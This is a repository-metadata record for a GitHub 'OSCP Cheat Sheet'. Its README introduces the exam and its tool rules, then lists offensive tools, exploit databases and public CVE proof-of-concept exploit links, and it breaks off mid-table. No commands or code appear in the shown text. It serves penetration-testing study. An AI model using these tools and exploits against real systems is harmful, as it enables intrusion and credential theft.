{"id":15032895,"url":"https://github.com/0xsyr0/oscp","last_synced_at":"2026-07-05T06:30:24.610Z","repository":{"id":47026242,"uuid":"420042240","full_name":"0xsyr0/OSCP","owner":"0xsyr0","description":"OSCP Cheat Sheet","archived":false,"fork":false,"pushed_at":"2025-02-10T08:49:48.000Z","size":5216,"stargazers_count":3030,"open_issues_count":0,"forks_count":637,"subscribers_count":64,"default_branch":"main","last_synced_at":"2025-02-10T09:22:15.809Z","etag":null,"topics":["cheat-sheet","cheatsheet","offensive","offensive-security","offsec","oscp","oscp-guide","oscp-plus","penetration-testing","pentesting","security"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xsyr0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":"CODE-OF-CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"0xsyr0","patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"lfx_crowdfunding":null,"custom":null}},"created_at":"2021-10-22T09:36:48.000Z","updated_at":"2025-02-10T08:49:53.000Z","dependencies_parsed_at":"2023-09-29T07:10:50.464Z","dependency_job_id":"c7035127-0d5a-45ef-b3ed-c64fe7164f3c","html_url":"https://github.com/0xsyr0/OSCP","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xsyr0","download_url":"https://codeload.github.com/0xsyr0/OSCP/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240425346,"owners_count":19799321,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cheat-sheet","cheatsheet","offensive","offensive-security","offsec","oscp","oscp-guide","oscp-plus","penetration-testing","pentesting","security"],"created_at":"2024-09-24T20:19:41.216Z","updated_at":"2026-07-05T06:30:24.426Z","avatar_url":"https://github.com/0xsyr0.png","language":"PowerShell","funding_links":["https://github.com/sponsors/0xsyr0"],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg width=\"300\" height=\"300\" src=\"/images/kali-linux.svg\"\u003e\n\u003c/p\u003e\n\n# OSCP Cheat Sheet\n\n![GitHub stars](https://img.shields.io/github/stars/0xsyr0/OSCP?logoColor=yellow) ![GitHub forks](https://img.shields.io/github/forks/0xsyr0/OSCP?logoColor=purple) ![GitHub watchers](https://img.shields.io/github/watchers/0xsyr0/OSCP?logoColor=green)\u003c/br\u003e\n![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/m/0xsyr0/OSCP) ![GitHub contributors](https://img.shields.io/github/contributors/0xsyr0/OSCP)\n\nSince this little project gets more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam. As OffSec published the `OffSec Certified Professional Plus` or `OSCP+` certification which is only valid for `3 years`, I now will add more advanced techniques like for example `Active Directory Certificate Services (ADCS) Abuse` and `Shadow Credentials Attacks` to cover as much course content as possible.\n\nFeel free to submit a pull request or reach out to me on [X](https://twitter.com/syr0_) for suggestions. Every contribution is appreciated!\n\n\u003e [!IMPORTANT]\n\u003e A guy on X got a point. Automatic exploitation tools like `sqlmap` are prohibited to use in the exam. The same goes for the automatic exploitation functionality of `LinPEAS`.\n\u003e I am not keeping track of current guidelines related to those tools. For that I want to point out that I am not responsible if anybody uses a tool without double checking the latest exam restrictions and fails the exam.\n\u003e Inform yourself before taking the exam!\n\nHere are the link to the [OSCP Exam Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) and the discussion about [LinPEAS](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/?hss_channel=tw-134994790). I hope this helps.\n\nAlso here are two more important resources you should check out before you take the exam.\n\n- [https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide)\n- [https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams](https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams)\n\n\u003e [!NOTE]\n\u003e This repository will also try to cover as much as possible of the tools required for the proving grounds boxes.\n\nThank you for reading.\n\n\u003cbr\u003e\n\n## Table of Contents\n\n- [Basics](#basics)\n- [Information Gathering](#information-gathering)\n- [Vulnerability Analysis](#vulnerability-analysis)\n- [Web Application Analysis](#web-application-analysis)\n- [Database Assessment](#database-assessment)\n- [Password Attacks](#password-attacks)\n- [Exploitation Tools](#exploitation-tools)\n- [Post Exploitation](#post-exploitation)\n- [Exploit Databases](#exploit-databases)\n- [CVEs](#cves)\n- [Payloads](#payloads)\n- [Wordlists](#wordlists)\n- [Reporting](#reporting)\n- [Social Media Resources](#social-media-resources)\n- [Commands](#commands)\n\t- [Basics](#basics-1)\n\t\t- [curl](#curl)\n\t\t- [File Transfer](#file-transfer)\n  \t\t- [FTP](#ftp)\n\t\t- [Kerberos](#kerberos)\n\t\t- [Linux](#linux)\n\t\t- [Microsoft Windows](#microsoft-windows)\n\t\t- [PHP Webserver](#php-webserver)\n\t\t- [Ping](#ping)\n\t\t- [Port Forwarding](#port-forwarding-1)\n\t\t- [Python Webserver](#python-webserver)\n\t\t- [RDP](#rdp)\n\t\t- [showmount](#showmount)\n  \t\t- [SMB](#smb)\n\t\t- [smbclient](#smbclient)\n\t\t- [SSH](#ssh)\n\t\t- [Time and Date](#time-and-date)\n\t\t- [Tmux](#tmux)\n\t\t- [Upgrading Shells](#upgrading-shells)\n\t\t- [VirtualBox](#virtualbox)\n\t\t- [virtualenv](#virtualenv)\n\t- [Information Gathering](#information-gathering-1)\n\t\t- [memcached](#memcached)\n\t\t- [NetBIOS](#netbios)\n\t\t- [Nmap](#nmap)\n\t\t- [Port Scanning](#port-scanning)\n\t\t- [snmpwalk](#snmpwalk)\n\t- [Web Application Analysis](#web-application-analysis-1)\n\t\t- [Burp Suite](#burp-suite)\n  \t\t- [cadaver](#cadaver)\n\t\t- [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)\n\t\t- [ffuf](#ffuf)\n\t\t- [Gobuster](#gobuster)\n\t\t- [GitTools](#gittools)\n\t\t- [Local File Inclusion (LFI)](#local-file-inclusion-lfi)\n\t\t- [PDF PHP Inclusion](#pdf-php-inclusion)\n\t\t- [PHP Upload Filter Bypasses](#php-upload-filter-bypasses)\n\t\t- [PHP Filter Chain Generator](#php-filter-chain-generator)\n\t\t- [PHP Generic Gadget Chains (PHPGGC)](#php-generic-gadget-chains-phpggc)\n\t\t- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)\n\t\t- [Server-Side Template Injection (SSTI)](#server-side-template-injection-ssti)\n\t\t- [Upload Vulnerabilities](#upload-vulnerabilities)\n\t\t- [wfuzz](#wfuzz)\n\t\t- [WPScan](#wpscan)\n\t\t- [XML External Entity (XXE)](#xml-external-entity-xxe)\n\t- [Database Analysis](#database-analysis)\n \t\t- [impacket-mssqlclient](#impacket-mssqlclient)\n\t\t- [MongoDB](#mongodb)\n\t\t- [MSSQL](#mssql)\n\t\t- [MySQL](#mysql)\n\t\t- [NoSQL Injection](#nosql-injection)\n\t\t- [PostgreSQL](#postgresql)\n\t\t- [Redis](#redis)\n\t\t- [SQL Injection](#sql-injection)\n\t\t- [SQL Truncation Attack](#sql-truncation-attack)\n\t\t- [sqlite3](#sqlite3)\n\t\t- [sqsh](#sqsh)\n\t- [Password Attacks](#password-attacks-1)\n\t\t- [DonPAPI](#donpapi)\n\t\t- [fcrack](#fcrack)\n  \t\t- [Group Policy Preferences (GPP)](#group-policy-preferences-gpp)\n\t\t- [hashcat](#hashcat)\n\t\t- [Hydra](#hydra)\n\t\t- [John](#john)\n\t\t- [Kerbrute](#kerbrute)\n\t\t- [LaZagne](#lazagne)\n\t\t- [mimikatz](#mimikatz)\n  \t\t- [NetExec](#netexec)\n\t\t- [pypykatz](#pypykatz)\n\t\t- [Spray-Passwords](#spray-passwords)\n\t- [Exploitation Tools](#exploitation-tools-1)\n\t\t- [Metasploit](#metasploit)\n\t- [Post Exploitation](#post-exploitation-1)\n \t\t- [Account Operators Group Membership](#account-operators-group-membership)\n \t\t- [Active Directory](#active-directory)\n \t\t- [Active Directory Certificate Services (AD CS)](#active-directory-certificate-services-ad-cs)\n\t\t- [ADCSTemplate](#adcstemplate)\n  \t\t- [ADMiner](#adminer)\n\t\t- [BloodHound](#bloodhound)\n\t\t- [BloodHound Python](#bloodhound-python)\n  \t\t- [bloodyAD](#bloodyAD)\n\t\t- [Certify](#certify)\n\t\t- [Certipy](#certipy)\n\t\t- [enum4linux-ng](#enum4linux-ng)\n\t\t- [Evil-WinRM](#evil-winrm)\n\t\t- [Impacket](#impacket-1)\n\t\t- [JAWS](#jaws)\n\t\t- [Kerberos](#kerberos-1)\n\t\t- [ldapsearch](#ldapsearch)\n\t\t- [Linux](#linux-1)\n\t\t- [Microsoft Windows](#microsoft-windows-1)\n\t\t- [PassTheCert](#passthecert)\n\t\t- [Penelope](#penelope)\n\t\t- [PKINITtools](#pkinittools)\n\t\t- [Port Scanning](#port-scanning-1)\n\t\t- [powercat](#powercat)\n\t\t- [Powermad](#powermad)\n\t\t- [PowerShell](#powershell)\n  \t\t- [PrivescCheck](#privesccheck)\n\t\t- [pwncat](#pwncat)\n\t\t- [rpcclient](#rpcclient)\n\t\t- [Rubeus](#rubeus)\n\t\t- [RunasCs](#runascs)\n\t\t- [Seatbelt](#seatbelt)\n\t\t- [Shadow Credentials](#shadow-credentials)\n\t\t- [smbpasswd](#smbpasswd)\n\t\t- [winexe](#winexe)\n\t- [Social Engineering Tools](#social-engineering-tools)\n\t\t- [Microsoft Office Word Phishing Macro](#microsoft-office-word-phishing-macro)\n\t\t- [Microsoft Windows Library Files](#microsoft-windows-library-files)\n\t- [CVE](#cve)\n\t\t- [CVE-2014-6271: Shellshock RCE PoC](#cve-2014-6271-shellshock-rce-poc)\n\t\t- [CVE-2016-1531: exim LPE](#cve-2016-1531-exim-lpe)\n\t\t- [CVE-2019-14287: Sudo Bypass](#cve-2019-14287-sudo-bypass)\n\t\t- [CVE-2020-1472: ZeroLogon PE](#cve-2020-1472-zerologon-pe)\n\t\t- [CVE-2021–3156: Sudo / sudoedit LPE](#cve-2021-3156-sudo--sudoedit-lpe)\n\t\t- [CVE-2021-44228: Log4Shell RCE (0-day)](#cve-2021-44228-log4shell-rce-0-day)\n\t\t- [CVE-2022-0847: Dirty Pipe LPE](#cve-2022-0847-dirty-pipe-lpe)\n\t\t- [CVE-2022-22963: Spring4Shell RCE (0-day)](#cve-2022-22963-spring4shell-rce-0-day)\n\t\t- [CVE-2022-31214: Firejail LPE](#cve-2022-31214-firejail-lpe)\n\t\t- [CVE-2023-21746: Windows NTLM EoP LocalPotato LPE](#cve-2023-21746-windows-ntlm-eop-localpotato-lpe)\n\t\t- [CVE-2023-22809: Sudo Bypass](#cve-2023-22809-sudo-bypass)\n\t\t- [CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)](#cve-2023-32629-cve-2023-2640-gameoverlay-ubuntu-kernel-exploit-lpe-0-day)\n  \t\t- [CVE-2023-4911: Looney Tunables LPE](#cve-2023-4911-looney-tunables-lpe)\n   \t\t- [CVE-2023-7028: GitLab Account Takeover](#cve-2023-7028-gitlab-account-takeover)\n   \t\t- [CVE-2024-4577: PHP-CGI Argument Injection Vulnerability RCE](#cve-2024-4577-php-cgi-argument-injection-vulnerability-rce)\n  \t\t- [GodPotato LPE](#godpotato-lpe)\n\t\t- [Juicy Potato LPE](#juicy-potato-lpe)\n  \t\t- [JuicyPotatoNG LPE](#juicypotatong-lpe)\n\t\t- [MySQL 4.x/5.0 User-Defined Function (UDF) Dynamic Library (2) LPE](#mysql-4x50-user-defined-function-udf-dynamic-library-2-lpe)\n  \t\t- [PrintSpoofer LPE](#printspoofer-lpe)\n\t\t- [SharpEfsPotato LPE](#sharpefspotato-lpe)\n\t\t- [Shocker Container Escape](#shocker-container-escape)\n\t- [Payloads](#payloads-1)\n\t\t- [Exiftool](#exiftool)\n\t\t- [Reverse Shells](#reverse-shells)\n\t\t- [Web Shells](#web-shells)\n\t- [Templates](#templates)\n\t\t- [ASPX Web Shell](#aspx-web-shell)\n\t\t- [Bad YAML](#bad-yaml)\n\t- [Wordlists](#wordlists-1)\n\t\t- [Bash](#bash)\n\t\t- [CeWL](#cewl)\n\t\t- [CUPP](#cupp)\n\t\t- [crunch](#crunch)\n  \t\t- [JavaScript Quick Wordlist](#javascript-quick-wordlist)\n\t\t- [Username Anarchy](#username-anarchy)\n\n### Basics\n\n| Name | URL |\n| --- | --- |\n| Chisel | https://github.com/jpillora/chisel |\n| CyberChef | https://gchq.github.io/CyberChef |\n| Ligolo-ng | https://github.com/nicocha30/ligolo-ng |\n| Swaks | https://github.com/jetmore/swaks |\n\n### Information Gathering\n\n| Name | URL |\n| --- | --- |\n| Nmap | https://github.com/nmap/nmap |\n\n### Vulnerability Analysis\n\n| Name | URL |\n| --- | --- |\n| nikto | https://github.com/sullo/nikto |\n| Sparta | https://github.com/SECFORCE/sparta |\n\n### Web Application Analysis\n\n| Name | URL |\n| --- | --- |\n| ffuf | https://github.com/ffuf/ffuf |\n| fpmvuln | https://github.com/hannob/fpmvuln |\n| Gobuster | https://github.com/OJ/gobuster |\n| JSON Web Tokens | https://jwt.io |\n| JWT_Tool | https://github.com/ticarpi/jwt_tool |\n| Leaky Paths | https://github.com/ayoubfathi/leaky-paths |\n| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |\n| PHP Filter Chain Generator | https://github.com/synacktiv/php_filter_chain_generator |\n| PHPGGC | https://github.com/ambionics/phpggc |\n| Spose | https://github.com/aancw/spose |\n| Wfuzz | https://github.com/xmendez/wfuzz |\n| WhatWeb | https://github.com/urbanadventurer/WhatWeb |\n| WPScan | https://github.com/wpscanteam/wpscan |\n\n### Database Assessment\n\n| Name | URL |\n| --- | --- |\n| RedisModules-ExecuteCommand | https://github.com/n0b0dyCN/RedisModules-ExecuteCommand |\n| Redis RCE | https://github.com/Ridter/redis-rce |\n| Redis Rogue Server | https://github.com/n0b0dyCN/redis-rogue-server |\n| SQL Injection Cheatsheet | https://tib3rius.com/sqli.html |\n\n### Password Attacks\n\n| Name | URL |\n| --- | --- |\n| Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet |\n| Firefox Decrypt | https://github.com/unode/firefox_decrypt |\n| hashcat | https://hashcat.net/hashcat |\n| Hydra | https://github.com/vanhauser-thc/thc-hydra |\n| John | https://github.com/openwall/john |\n| keepass-dump-masterkey | https://github.com/CMEPW/keepass-dump-masterkey |\n| KeePwn | https://github.com/Orange-Cyberdefense/KeePwn |\n| Kerbrute | https://github.com/ropnop/kerbrute |\n| LaZagne | https://github.com/AlessandroZ/LaZagne |\n| mimikatz | https://github.com/gentilkiwi/mimikatz |\n| NetExec | https://github.com/Pennyw0rth/NetExec |\n| ntlm.pw | https://ntlm.pw |\n| pypykatz | https://github.com/skelsec/pypykatz |\n\n### Exploitation Tools\n\n| Name | URL |\n| --- | --- |\n| Evil-WinRM | https://github.com/Hackplayers/evil-winrm |\n| Metasploit | https://github.com/rapid7/metasploit-framework |\n\n### Post Exploitation\n\n| Name | URL |\n| --- | --- |\n| ADCSKiller - An ADCS Exploitation Automation Tool | https://github.com/grimlockx/ADCSKiller |\n| ADCSTemplate | https://github.com/GoateePFE/ADCSTemplate |\n| ADMiner | https://github.com/Mazars-Tech/AD_Miner |\n| adPEAS | https://github.com/ajm4n/adPEAS |\n| BloodHound Docker | https://github.com/belane/docker-bloodhound |\n| BloodHound | https://github.com/BloodHoundAD/BloodHound |\n| BloodHound | https://github.com/ly4k/BloodHound |\n| BloodHound Collectors | https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors |\n| BloodHound Python | https://github.com/dirkjanm/BloodHound.py |\n| bloodhound-quickwin | https://github.com/kaluche/bloodhound-quickwin |\n| Certify | https://github.com/GhostPack/Certify |\n| Certipy | https://github.com/ly4k/Certipy |\n| Cheat Sheet - Attack Active Directory | https://github.com/drak3hft7/Cheat-Sheet---Active-Directory |\n| DonPAPI | https://github.com/login-securite/DonPAPI |\n| enum4linux-ng | https://github.com/cddmp/enum4linux-ng |\n| Ghostpack-CompiledBinaries | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries |\n| GTFOBins | https://gtfobins.github.io |\n| Impacket | https://github.com/fortra/impacket |\n| Impacket Static Binaries | https://github.com/ropnop/impacket_static_binaries |\n| JAWS | https://github.com/411Hall/JAWS |\n| KrbRelay | https://github.com/cube0x0/KrbRelay |\n| KrbRelayUp | https://github.com/Dec0ne/KrbRelayUp |\n| Krbrelayx | https://github.com/dirkjanm/krbrelayx |\n| LAPSDumper | https://github.com/n00py/LAPSDumper |\n| LES | https://github.com/The-Z-Labs/linux-exploit-suggester |\n| LinEnum | https://github.com/rebootuser/LinEnum |\n| lsassy | https://github.com/Hackndo/lsassy |\n| Moriaty | https://github.com/BC-SECURITY/Moriarty |\n| nanodump | https://github.com/fortra/nanodump |\n| PassTheCert | https://github.com/AlmondOffSec/PassTheCert |\n| PEASS-ng | https://github.com/carlospolop/PEASS-ng |\n| Penelope | https://github.com/brightio/penelope |\n| PKINITtools | https://github.com/dirkjanm/PKINITtools |\n| powercat | https://github.com/besimorhino/powercat |\n| PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack |\n| PowerUp | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 |\n| PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 |\n| PowerView.py | https://github.com/aniqfakhrul/powerview.py |\n| PPLdump | https://github.com/itm4n/PPLdump |\n| Priv2Admin | https://github.com/gtworek/Priv2Admin |\n| PrivescCheck | https://github.com/itm4n/PrivescCheck |\n| PSPKIAudit | https://github.com/GhostPack/PSPKIAudit |\n| pspy | https://github.com/DominicBreuker/pspy |\n| pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit |\n| pwncat | https://github.com/calebstewart/pwncat |\n| pypykatz | https://github.com/skelsec/pypykatz |\n| pyWhisker | https://github.com/ShutdownRepo/pywhisker |\n| Rubeus | https://github.com/GhostPack/Rubeus |\n| RunasCs | https://github.com/antonioCoco/RunasCs |\n| RustHound | https://github.com/OPENCYBER-FR/RustHound |\n| scavenger | https://github.com/SpiderLabs/scavenger |\n| SharpADWS | https://github.com/wh0amitz/SharpADWS |\n| SharpCollection | https://github.com/Flangvik/SharpCollection |\n| SharpChromium | https://github.com/djhohnstein/SharpChromium |\n| SharpHound | https://github.com/BloodHoundAD/SharpHound |\n| SharpView | https://github.com/tevora-threat/SharpView |\n| Sherlock | https://github.com/rasta-mouse/Sherlock |\n| WADComs | https://wadcoms.github.io |\n| Watson | https://github.com/rasta-mouse/Watson |\n| WESNG | https://github.com/bitsadmin/wesng\n| Whisker | https://github.com/eladshamir/Whisker |\n| Windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check |\n| Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html |\n| Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation |\n\n### Exploit Databases\n\n| Database | URL |\n| --- | --- |\n| 0day.today Exploit Database | https://0day.today |\n| Exploit Database | https://www.exploit-db.com |\n| Packet Storm | https://packetstormsecurity.com |\n| Sploitus | https://sploitus.com |\n\n### CVEs\n\n| CVE | Descritpion | URL |\n| --- | --- | --- |\n| CVE-2014-6271 | Shocker RCE | https://github.com/nccgroup/shocker |\n| CVE-2014-6271 | Shellshock RCE PoC | https://github.com/zalalov/CVE-2014-6271 |\n| CVE-2014-6271 | Shellshocker RCE POCs | https://github.com/mubix/shellshocker-pocs |\n| CVE-2016-5195 | Dirty COW LPE | https://github.com/firefart/dirtycow |\n| CVE-2016-5195 | Dirty COW '/proc/self/mem' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40847 |\n| CVE-2016-5195 | Dirty COW 'PTRACE_POKEDATA' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40839 |\n| CVE-2017-0144 | EternalBlue (MS17-010) RCE | https://github.com/d4t4s3c/Win7Blue |\n| CVE-2017-0199 | RTF Dynamite RCE | https://github.com/bhdresh/CVE-2017-0199 |\n| CVE-2018-7600 | Drupalgeddon 2 RCE | https://github.com/g0rx/CVE-2018-7600-Drupal-RCE |\n| CVE-2018-10933 | libSSH Authentication Bypass | https://github.com/blacknbunny/CVE-2018-10933 |\n| CVE-2018-16509 | Ghostscript PIL RCE | https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509 |\n| CVE-2019-14287 | Sudo Bypass LPE | https://github.com/n0w4n/CVE-2019-14287 |\n| CVE-2019-18634 | Sudo Buffer Overflow LPE | https://github.com/saleemrashid/sudo-cve-2019-18634 |\n| CVE-2019-5736 | RunC Container Escape PoC | https://github.com/Frichetten/CVE-2019-5736-PoC |\n| CVE-2019-6447 | ES File Explorer Open Port Arbitrary File Read | https://github.com/fs0c131y/ESFileExplorerOpenPortVuln |\n| CVE-2019-7304 | dirty_sock LPE | https://github.com/initstring/dirty_sock |\n| CVE-2020-0796 | SMBGhost RCE PoC | https://github.com/chompie1337/SMBGhost_RCE_PoC |\n| CVE-2020-1472 | ZeroLogon PE Checker \u0026 Exploitation Code | https://github.com/VoidSec/CVE-2020-1472 |\n| CVE-2020-1472 | ZeroLogon PE Exploitation Script | https://github.com/risksense/zerologon |\n| CVE-2020-1472 | ZeroLogon PE PoC | https://github.com/dirkjanm/CVE-2020-1472 |\n| CVE-2020-1472 | ZeroLogon PE Testing Script | https://github.com/SecuraBV/CVE-2020-1472 |\n| CVE-2021-1675,CVE-2021-34527 | PrintNightmare LPE RCE | https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527 |\n| CVE-2021-1675 | PrintNightmare LPE RCE (PowerShell Implementation) | https://github.com/calebstewart/CVE-2021-1675 |\n| CVE-2021-21972 | vCenter RCE | https://github.com/horizon3ai/CVE-2021-21972 |\n| CVE-2021-22204 | ExifTool Command Injection RCE | https://github.com/AssassinUKG/CVE-2021-22204 |\n| CVE-2021-22204 | GitLab ExifTool RCE | https://github.com/CsEnox/Gitlab-Exiftool-RCE |\n| CVE-2021-22204 | GitLab ExifTool RCE (Python Implementation) | https://github.com/convisolabs/CVE-2021-22204-exiftool |\n| CVE-2021-26085 | Confluence Server RCE | https://github.com/Phuong39/CVE-2021-26085 |\n| CVE-2021-27928 | MariaDB/MySQL wsrep provider RCE | https://github.com/Al1ex/CVE-2021-27928 |\n| CVE-2021-3129 | Laravel Framework RCE | https://github.com/nth347/CVE-2021-3129_exploit |\n| CVE-2021-3156 | Sudo / sudoedit LPE  | https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit |\n| CVE-2021-3156 | Sudo / sudoedit LPE PoC | https://github.com/blasty/CVE-2021-3156 |\n| CVE-2021-3493 | OverlayFS Ubuntu Kernel Exploit LPE | https://github.com/briskets/CVE-2021-3493 |\n| CVE-2021-3560 | polkit LPE (C Implementation) | https://github.com/hakivvi/CVE-2021-3560 |\n| CVE-2021-3560 | polkit LPE | https://github.com/Almorabea/Polkit-exploit |\n| CVE-2021-3560 | polkit LPE PoC | https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation |\n| CVE-2021-36934 | HiveNightmare LPE | https://github.com/GossiTheDog/HiveNightmare |\n| CVE-2021-36942 | PetitPotam | https://github.com/topotam/PetitPotam |\n| CVE-2021-36942 | DFSCoerce | https://github.com/Wh04m1001/DFSCoerce |\n| CVE-2021-4034 | PwnKit Pkexec Self-contained Exploit LPE | https://github.com/ly4k/PwnKit |\n| CVE-2021-4034 | PwnKit Pkexec LPE PoC (1) | https://github.com/dzonerzy/poc-cve-2021-4034 |\n| CVE-2021-4034 | PwnKit Pkexec LPE PoC (2) | https://github.com/arthepsy/CVE-2021-4034 |\n| CVE-2021-4034 | PwnKit Pkexec LPE PoC (3) | https://github.com/nikaiw/CVE-2021-4034 |\n| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Archive) | https://github.com/klinix5/InstallerFileTakeOver |\n| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Fork) | https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver |\n| CVE-2021-41773,CVE-2021-42013, CVE-2020-17519 | Simples Apache Path Traversal (0-day) | https://github.com/MrCl0wnLab/SimplesApachePathTraversal |\n| CVE-2021-42278,CVE-2021-42287 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE | https://github.com/WazeHell/sam-the-admin |\n| CVE-2021-42278 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE (Python Implementation) | https://github.com/ly4k/Pachine |\n| CVE-2021-42287,CVE-2021-42278 | noPac LPE (1) | https://github.com/cube0x0/noPac |\n| CVE-2021-42287,CVE-2021-42278 | noPac LPE (2) | https://github.com/Ridter/noPac |\n| CVE-2021-42321 | Microsoft Exchange Server RCE | https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 |\n| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/kozmer/log4j-shell-poc |\n| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/welk1n/JNDI-Injection-Exploit |\n| CVE-2022-0847 | DirtyPipe-Exploit LPE | https://github.com/n3rada/DirtyPipe |\n| CVE-2022-0847 | DirtyPipe-Exploits LPE | https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits |\n| CVE-2022-21999 | SpoolFool, Windows Print Spooler LPE | https://github.com/ly4k/SpoolFool |\n| CVE-2022-22963 | Spring4Shell RCE (0-day) | https://github.com/tweedge/springcore-0day-en |\n| CVE-2022-23119,CVE-2022-23120 | Trend Micro Deep Security Agent for Linux Arbitrary File Read | https://github.com/modzero/MZ-21-02-Trendmicro |\n| CVE-2022-24715 | Icinga Web 2 Authenticated Remote Code Execution RCE | https://github.com/JacobEbben/CVE-2022-24715 |\n| CVE-2022-26134 | ConfluentPwn RCE (0-day) | https://github.com/redhuntlabs/ConfluentPwn |\n| CVE-2022-31214 | Firejail / Firejoin LPE | https://seclists.org/oss-sec/2022/q2/188 |\n| CVE-2022-31214 | Firejail / Firejoin LPE | https://www.openwall.com/lists/oss-security/2022/06/08/10 |\n| CVE-2022-34918 | Netfilter Kernel Exploit LPE | https://github.com/randorisec/CVE-2022-34918-LPE-PoC |\n| CVE-2022-46169 | Cacti Authentication Bypass RCE | https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit |\n| CVE-2023-20598 | PDFWKRNL Kernel Driver LPE | https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL |\n| CVE-2023-21746 | Windows NTLM EoP LocalPotato LPE | https://github.com/decoder-it/LocalPotato |\n| CVE-2023-21768 | Windows Ancillary Function Driver for WinSock LPE POC | https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768 |\n| CVE-2023-21817 | Kerberos Unlock LPE PoC | https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b |\n| CVE-2023-22809 | sudoedit LPE | https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc |\n| CVE-2023-23752 | Joomla Unauthenticated Information Disclosure | https://github.com/Acceis/exploit-CVE-2023-23752 |\n| CVE-2023-25690 | Apache mod_proxy HTTP Request Smuggling PoC | https://github.com/dhmosfunk/CVE-2023-25690-POC |\n| CVE-2023-28879 | Shell in the Ghost: Ghostscript RCE PoC | https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce |\n| CVE-2023-32233 | Use-After-Free in Netfilter nf_tables LPE | https://github.com/Liuk3r/CVE-2023-32233 |\n| CVE-2023-32629, CVE-2023-2640 | GameOverlay Ubuntu Kernel Exploit LPE (0-day) | https://twitter.com/liadeliyahu/status/1684841527959273472?s=09 |\n| CVE-2023-36874 | Windows Error Reporting Service LPE (0-day) | https://github.com/Wh04m1001/CVE-2023-36874 |\n| CVE-2023-51467, CVE-2023-49070 | Apache OFBiz Authentication Bypass | https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass |\n| CVE-2023-7028 | GitLab Account Takeover | https://github.com/V1lu0/CVE-2023-7028 |\n| CVE-2023-7028 | GitLab Account Takeover | https://github.com/Vozec/CVE-2023-7028 |\n| CVE-2024-0582 | Ubuntu Linux Kernel io_uring LPE | 